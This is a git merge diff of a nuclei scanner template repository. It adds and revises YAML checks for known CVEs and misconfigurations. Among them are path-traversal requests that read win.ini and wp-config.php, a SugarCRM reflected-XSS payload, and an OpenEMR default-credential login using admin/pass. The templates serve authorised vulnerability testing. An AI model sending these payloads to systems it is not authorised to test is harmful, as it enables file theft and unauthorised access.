Merge branch 'projectdiscovery:master' into master

2022-04-26 22:05:23 +07:00 · 2022-04-26 22:05:23 +07:00 · 7df3487df9
parent d269137ef4 a1e0362211
commit 7df3487df9
25 changed files with 309 additions and 55 deletions
--- a/.new-additions
+++ b/.new-additions
@ -1,3 +1,5 @@
+cves/2010/CVE-2010-4239.yaml
+cves/2018/CVE-2018-5715.yaml
 cves/2019/CVE-2019-16996.yaml
 cves/2021/CVE-2021-44077.yaml
 cves/2021/CVE-2021-44515.yaml
@ -6,9 +8,15 @@ cves/2022/CVE-2022-0208.yaml
 cves/2022/CVE-2022-0595.yaml
 cves/2022/CVE-2022-1020.yaml
 cves/2022/CVE-2022-1054.yaml
+cves/2022/CVE-2022-1119.yaml
 cves/2022/CVE-2022-27849.yaml
+default-logins/openemr/openemr-default-login.yaml
+exposed-panels/synapse-mobility-panel.yaml
+exposures/configs/azure-domain-tenant.yaml
 exposures/configs/webpack-config.yaml
 exposures/files/readme-md.yaml
+miscellaneous/firebase-database-extractor.yaml
+technologies/microsoft/microsoft-sharepoint-detect.yaml
 token-spray/api-hirak-rates.yaml
 vulnerabilities/other/WSO2-2019-0598.yaml
 vulnerabilities/other/avada-xss.yaml
--- a/cves/2010/CVE-2010-4239.yaml
+++ b/cves/2010/CVE-2010-4239.yaml
@ -0,0 +1,30 @@
+id: CVE-2010-4239
+
+info:
+  name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion
+  author: 0x_akoko
+  severity: high
+  description: Tiki Wiki CMS Groupware 5.2 has Local File Inclusion
+  reference:
+    - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt
+    - https://www.cvedetails.com/cve/CVE-2010-4239
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2010-4239
+    cwe-id: CWE-20
+  tags: cve,cve2010,tikiwiki,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
--- a/cves/2016/CVE-2016-3088.yaml
+++ b/cves/2016/CVE-2016-3088.yaml
@ -1,10 +1,10 @@
 id: CVE-2016-3088

 info:
-  name: ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088)
+  name: Apache ActiveMQ Fileserver - Arbitrary File Write
  author: fq_hsu
  severity: critical
-  description: The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.
+  description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.
  reference:
    - https://www.exploit-db.com/exploits/40857
    - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
@ -38,3 +38,5 @@ requests:
          - "status_code_2==200"
          - "contains((body_2), '{{randstr}}')"
        condition: and
+
+# Enhanced by mp on 2022/04/22
--- a/cves/2018/CVE-2018-15961.yaml
+++ b/cves/2018/CVE-2018-15961.yaml
@ -1,7 +1,7 @@
 id: CVE-2018-15961

 info:
-  name: Adobe ColdFusion Unrestricted File Upload RCE
+  name: Adobe ColdFusion - Unrestricted File Upload Remote Code Execution
  author: SkyLark-Lab,ImNightmaree
  severity: critical
  description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.
@ -63,3 +63,5 @@ requests:
      - type: status
        status:
          - 200
+
+# Enhanced by mp on 2022/04/22
--- a/cves/2018/CVE-2018-5715.yaml
+++ b/cves/2018/CVE-2018-5715.yaml
@ -0,0 +1,40 @@
+id: CVE-2018-5715
+
+info:
+  name: SugarCRM 3.5.1 - Reflected XSS
+  author: edoardottt
+  severity: medium
+  description: phprint.php in SugarCRM 3.5.1 has XSS via a parameter name in the query string (aka a $key variable).
+  reference:
+    - https://www.exploit-db.com/exploits/43683
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-5715
+  metadata:
+    shodan-query: http.html:"SugarCRM Inc. All Rights Reserved"
+    google-dork: intext:"SugarCRM Inc. All Rights Reserved"
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2018-5715
+    cwe-id: CWE-79
+  tags: cve,cve2018,sugarcrm,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '&"/><script>alert(1)</script>=&"><< Back</a><br><br>'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
--- a/cves/2018/CVE-2018-7251.yaml
+++ b/cves/2018/CVE-2018-7251.yaml
@ -1,16 +1,18 @@
 id: CVE-2018-7251

 info:
-  name: AnchorCMS Error Log Exposure
+  name: Anchor CMS 0.12.3 - Error Log Exposure
  author: pdteam
  severity: critical
-  description: An issue was discovered in config/error.php in Anchor 0.12.3. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred.
+  description: |
+    Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue  in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred.
  reference:
    - https://github.com/anchorcms/anchor-cms/issues/1247
    - http://www.andmp.com/2018/02/advisory-assigned-CVE-2018-7251-in-anchorcms.html
    - https://twitter.com/finnwea/status/965279233030393856
    - http://packetstormsecurity.com/files/154723/Anchor-CMS-0.12.3a-Information-Disclosure.html
    - https://github.com/anchorcms/anchor-cms/releases/tag/0.12.7
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-7251
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
@ -29,3 +31,6 @@ requests:
          - '"message":'
          - '"trace":['
        condition: and
+
+
+# Enhanced by mp on 2022/04/22
--- a/cves/2020/CVE-2020-16952.yaml
+++ b/cves/2020/CVE-2020-16952.yaml
@ -5,35 +5,37 @@ info:
  author: dwisiswant0
  severity: high
  description: A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'.
-    This CVE ID is unique from CVE-2020-16951.
  reference:
-    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
    - https://srcincite.io/pocs/cve-2020-16952.py.txt
+    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
    - https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 7.8
    cve-id: CVE-2020-16952
    cwe-id: CWE-346
-  tags: cve,cve2020,sharepoint,iis,microsoft
+  tags: cve,cve2020,sharepoint,iis,microsoft,ssi,rce

 requests:
  - method: GET
    path:
      - "{{BaseURL}}"
+
    matchers-condition: and
    matchers:
      - type: regex
+        part: body
        regex:
          - "15\\.0\\.0\\.(4571|5275|4351|5056)"
          - "16\\.0\\.0\\.(10337|10364|10366)"
          # - "16.0.10364.20001"
        condition: or
-        part: body
-      - type: word
-        words:
-          - "MicrosoftSharePointTeamServices"
+
+      - type: regex
        part: header
+        regex:
+          - "(?i)(Microsoftsharepointteamservices:)"
+
      - type: status
        status:
          - 200
--- a/cves/2020/CVE-2020-26214.yaml
+++ b/cves/2020/CVE-2020-26214.yaml
@ -1,10 +1,10 @@
 id: CVE-2020-26214

 info:
-  name: Alerta Authentication Bypass
+  name: Alerta < 8.1.0 - Authentication Bypass
  author: CasperGN
  severity: critical
-  description: Alerta prior to version 8.1.0 is prone to Authentication Bypass when using LDAP as authorization provider and the LDAP server accepts Unauthenticated Bind requests.
+  description: Alerta prior to version 8.1.0 is prone to authentication bypass when using LDAP as an authorization provider and the LDAP server accepts Unauthenticated Bind requests.
  reference:
    - https://github.com/advisories/GHSA-5hmm-x8q8-w5jh
    - https://tools.ietf.org/html/rfc4513#section-5.1.2
@ -43,4 +43,4 @@ requests:
        regex:
          - 'name":\s*"Alerta ([0-7]\.[0-9]\.[0-9]|8\.0.[0-9])"'

-# Enhanced by mp on 2022/03/27
+# Enhanced by mp on 2022/04/22
--- a/cves/2021/CVE-2021-32030.yaml
+++ b/cves/2021/CVE-2021-32030.yaml
@ -4,10 +4,10 @@ info:
  name: ASUS GT-AC2900 - Authentication Bypass
  author: gy741
  severity: critical
-  description: The administrator application on ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access
-    to the administrator interface. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations.
+  description: "ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator application. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations."
  reference:
    - https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-32030
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
@ -41,3 +41,5 @@ requests:
          - "alias"
          - "model_name"
        condition: and
+
+# Enhanced by mp on 2022/04/22
--- a/cves/2021/CVE-2021-38540.yaml
+++ b/cves/2021/CVE-2021-38540.yaml
@ -4,8 +4,8 @@ info:
  name: Apache Airflow - Unauthenticated Variable Import
  author: pdteam
  severity: critical
-  description: The variable import endpoint was not protected by authentication in Airflow >=2.0.0, <2.1.3. This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially
-    resulting in a denial of service, information disclosure or remote code execution. This issue affects Apache Airflow >=2.0.0, <2.1.3.
+  description: Apache Airflow Airflow >=2.0.0 and <2.1.3 does not protect the variable import endpoint which allows unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution.
+  remediation: Upgrade to Apache Airflow 2.1.3 or higher.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-38540
  classification:
@ -66,4 +66,7 @@ requests:

      - type: word
        words:
-          - 'You should be redirected automatically to target URL: <a href="/">'
+          - 'You should be redirected automatically to target URL: <a href="/">'
+
+
+# Enhanced by mp on 2022/04/22
--- a/cves/2021/CVE-2021-40438.yaml
+++ b/cves/2021/CVE-2021-40438.yaml
@ -4,7 +4,7 @@ info:
  name: Apache <= 2.4.48 Mod_Proxy SSRF
  author: pdteam
  severity: critical
-  description: Apache 2.4.8 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.
+  description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.
  reference:
    - https://firzen.de/building-a-poc-for-cve-2021-40438
    - https://httpd.apache.org/security/vulnerabilities_24.html
@ -14,7 +14,7 @@ info:
    cvss-score: 9.0
    cve-id: CVE-2021-40438
    cwe-id: CWE-918
-  remediation: Upgrade to Apache version 2.4.49 or newer.
+  remediation: Upgrade to Apache version 2.4.49 or later.
  tags: cve,cve2021,ssrf,apache,mod-proxy

 requests:
@ -29,4 +29,5 @@ requests:
        words:
          - "Interactsh Server"

-# Enhanced by cs on 2022/02/22
+
+# Enhanced by mp on 2022/04/22
--- a/cves/2021/CVE-2021-42013.yaml
+++ b/cves/2021/CVE-2021-42013.yaml
@ -4,10 +4,8 @@ info:
  name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
  author: nvn1729,0xd0ff9
  severity: critical
-  description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root.
-    If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations,
-    for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for
-    the original vulnerability CVE-2021-41773.
+  description: |
+    A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
  reference:
    - https://httpd.apache.org/security/vulnerabilities_24.html
    - https://github.com/apache/httpd/commit/5c385f2b6c8352e2ca0665e66af022d6e936db6d
@ -50,4 +48,4 @@ requests:
        words:
          - "CVE-2021-42013"

-# Enhanced by mp on 2022/02/27
+# Enhanced by mp on 2022/04/22
--- a/cves/2021/CVE-2021-45232.yaml
+++ b/cves/2021/CVE-2021-45232.yaml
@ -1,11 +1,10 @@
 id: CVE-2021-45232

 info:
-  name: Apache APISIX Dashboard API Unauthorized Access
+  name: Apache APISIX Dashboard <2.10.1 API Unauthorized Access
  author: Mr-xn
  severity: critical
-  description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed
-    based on framework `droplet`,  some API directly use the interface of framework `gin` thus bypassing their authentication.
+  description: "In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`,  some API directly use the interface of framework `gin` thus bypassing their authentication."
  reference:
    - https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/
    - https://github.com/pingpongcult/CVE-2021-45232
@ -36,4 +35,4 @@ requests:
        status:
          - 200

-# Enhanced by mp on 2022/02/28
+# Enhanced by mp on 2022/04/22
--- a/cves/2022/CVE-2022-1119.yaml
+++ b/cves/2022/CVE-2022-1119.yaml
@ -0,0 +1,33 @@
+id: CVE-2022-1119
+
+info:
+  name: WordPress Simple File List < 3.2.8 - Unauthenticated Arbitrary File Download
+  author: random-robbie
+  severity: high
+  description: |
+    The plugin is vulnerable to Arbitrary File Download via the eeFile parameter found in the ~/includes/ee-downloader.php file due to missing controls which makes it possible unauthenticated attackers to supply a path to a file that will subsequently be downloaded
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1119
+    - https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e
+  classification:
+    cve-id: CVE-2022-1119
+    cwe-id: CWE-552
+  tags: cve,cve2022,lfi,wordpress
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/cves/2022/CVE-2022-24112.yaml
+++ b/cves/2022/CVE-2022-24112.yaml
@ -1,18 +1,15 @@
 id: CVE-2022-24112

 info:
-  name: Apache APISIX apisix/batch-requests Remote Code Execution
+  name: Apache APISIX - Remote Code Execution
  author: Mr-xn
  severity: critical
-  description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE.
-    An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data
-    panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote
-    IP. But due to a bug in the code, this check can be bypassed.
+  description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-24112
    - https://www.openwall.com/lists/oss-security/2022/02/11/3
    - https://twitter.com/sirifu4k1/status/1496043663704858625
    - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-24112
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
@ -80,4 +77,4 @@ requests:
        regex:
          - 'GET \/([a-z-]+) HTTP'

-# Enhanced by mp on 2022/03/08
+# Enhanced by mp on 2022/04/22
--- a/default-logins/openemr/openemr-default-login.yaml
+++ b/default-logins/openemr/openemr-default-login.yaml
@ -0,0 +1,46 @@
+id: openemr-default-login
+
+info:
+  name: OpenEMR Default Login
+  author: Geekby
+  description: OpenEMR default login was discovered.
+  severity: high
+  reference:
+    - https://github.com/openemr/openemr-devops/tree/master/docker/openemr/6.1.0/#openemr-official-docker-image
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cwe-id: CWE-522
+  metadata:
+    fofa-query: app="OpenEMR"
+    shodan-query: http.html:"OpenEMR"
+  tags: openemr,default-login
+
+requests:
+  - raw:
+      - |
+        POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_login_session_management=1&languageChoice=1&authUser={{user}}&clearPass={{pass}}&languageChoice=10
+
+    attack: pitchfork
+    payloads:
+      user:
+        - admin
+      pass:
+        - pass
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "main.php?token_main="
+          - "OpenEMR"
+        condition: and
+
+      - type: status
+        status:
+          - 302
--- a/exposed-panels/openemr-detect.yaml
+++ b/exposed-panels/openemr-detect.yaml
@ -1,13 +1,14 @@
 id: openemr-detect
-
+
 info:
  name: OpenEMR Product Detect
  author: pussycat0x
  severity: info
  metadata:
-    shodan-dork: 'app="OpenEMR"'
+    fofa-query: app="OpenEMR"
+    shodan-query: http.html:"OpenEMR"
  tags: panel,openemr
-
+
 requests:
  - method: GET
    path:
--- a/exposures/configs/azure-domain-tenant.yaml
+++ b/exposures/configs/azure-domain-tenant.yaml
@ -0,0 +1,33 @@
+id: azure-domain-tenant
+
+info:
+  name: Microsoft Azure - Domain Tenant ID
+  author: V0idC0de
+  severity: info
+  description: Checks if the domain is part of an Azure tenant and finds the ID using Azure's OpenID discovery page.
+  tags: azure,microsoft,cloud
+
+
+requests:
+  - raw:
+      - |
+        @Host: https://login.microsoftonline.com:443
+        GET /{{Host}}/v2.0/.well-known/openid-configuration HTTP/1.1
+        Host: login.microsoftonline.com
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "token_endpoint"
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - "\"https:\\/\\/login\\.microsoftonline\\.com\\/([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})"
--- a/miscellaneous/firebase-database-extractor.yaml
+++ b/miscellaneous/firebase-database-extractor.yaml
@ -0,0 +1,20 @@
+id: firebase-database-extractor
+
+info:
+  name: Firebase Database Extract Check
+  author: rafaelwdornelas
+  severity: info
+  description: Extract Firebase Database
+  tags: firebase,misc
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "[a-z0-9.-]+\\.firebaseio\\.com"
+          - "[a-z0-9.-]+\\.firebaseapp\\.com"
--- a/misconfiguration/aem/aem-crx-bypass.yaml
+++ b/misconfiguration/aem/aem-crx-bypass.yaml
@ -1,12 +1,14 @@
 id: aem-crx-bypass

 info:
-  name: AEM CRX Bypass
+  name: AEM Package Manager - Authentication Bypass
  author: dhiyaneshDK
+  description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed.
  severity: critical
+  remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages."
  reference:
    - https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
-  tags: aem
+  tags: aem,adobe

 requests:
  - raw:
@ -40,3 +42,5 @@ requests:
      - type: status
        status:
          - 200
+
+# Enhanced by mp on 2022/04/22
--- a/misconfiguration/aem/aem-groovyconsole.yaml
+++ b/misconfiguration/aem/aem-groovyconsole.yaml
@ -1,14 +1,14 @@
 id: aem-groovyconsole

 info:
-  name: AEM Groovy console enabled
+  name: AEM Groovy Console Discovery
  author: Dheerajmadhukar
  severity: critical
-  description: Groovy console is exposed, RCE is possible.
+  description: An Adobe Experience Manager Groovy console was discovered. This can possibly lead to remote code execution.
  reference:
    - https://hackerone.com/reports/672243
    - https://twitter.com/XHackerx007/status/1435139576314671105
-  tags: aem
+  tags: aem,adobe

 requests:
  - method: GET
@ -32,4 +32,6 @@ requests:

      - type: status
        status:
-          - 200
+          - 200
+
+# Enhanced by mp on 2022/04/22
--- a/misconfiguration/proxy/metadata-alibaba.yaml
+++ b/misconfiguration/proxy/metadata-alibaba.yaml
@ -39,4 +39,5 @@ requests:
        part: body
        words:
          - "zone-id"
-# Enhanced by cs on 2022/02/14
+
+# Enhanced by mp on 2022/04/22
--- a/misconfiguration/proxy/metadata-aws.yaml
+++ b/misconfiguration/proxy/metadata-aws.yaml
@ -12,7 +12,7 @@ info:
  name: Amazon AWS Metadata Service Check
  author: sullo
  severity: critical
-  description: The AWS host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. Upgrade to IMDSv2.
+  description: The AWS host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure.
  reference:
    - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
    - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -41,4 +41,5 @@ requests:
          - "public-ipv4"
          - "privateIp"
        condition: or
-# Enhanced by cs on 2022/02/14
+
+# Enhanced by mp on 2022/04/22
--- a/technologies/microsoft/microsoft-sharepoint-detect.yaml
+++ b/technologies/microsoft/microsoft-sharepoint-detect.yaml
@ -0,0 +1,24 @@
+id: microsoft-sharepoint-detect
+
+info:
+  name: Microsoft SharePoint Detect
+  author: p-l-
+  severity: info
+  description: Check for SharePoint, using HTTP header MicrosoftSharePointTeamServices
+  tags: sharepoint,iis,microsoft,tech
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - "(?i)(Microsoftsharepointteamservices:)"
+
+    extractors:
+      - type: kval
+        kval:
+          - MicrosoftSharePointTeamServices
--- a/vulnerabilities/other/antsword-backdoor.yaml
+++ b/vulnerabilities/other/antsword-backdoor.yaml
@ -1,17 +1,17 @@
 id: antsword-backdoor

 info:
-  name: Antsword Backdoor Identified
+  name: AntSword Backdoor Detection
  author: ffffffff0x
  severity: critical
-  description: The Antsword application contains a backdoor shell.
+  description: An AntSword application backdoor shell was discovered.
  reference:
    - https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-553
-  remediation: Reinstall Anstsword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms.
+  remediation: Reinstall AnstSword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms.
  tags: backdoor,antsword

 requests:
@ -33,4 +33,4 @@ requests:
        status:
          - 200

-# Enhanced by cs 2022/03/31
+# Enhanced by mp on 2022/04/22